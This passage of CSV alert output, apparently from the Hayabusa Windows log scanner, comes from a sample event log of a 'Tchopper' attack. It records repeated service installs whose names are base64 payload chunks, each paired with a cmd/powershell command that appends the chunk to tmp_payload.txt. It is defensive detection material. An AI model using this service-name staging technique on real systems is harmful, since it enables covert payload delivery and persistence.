start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
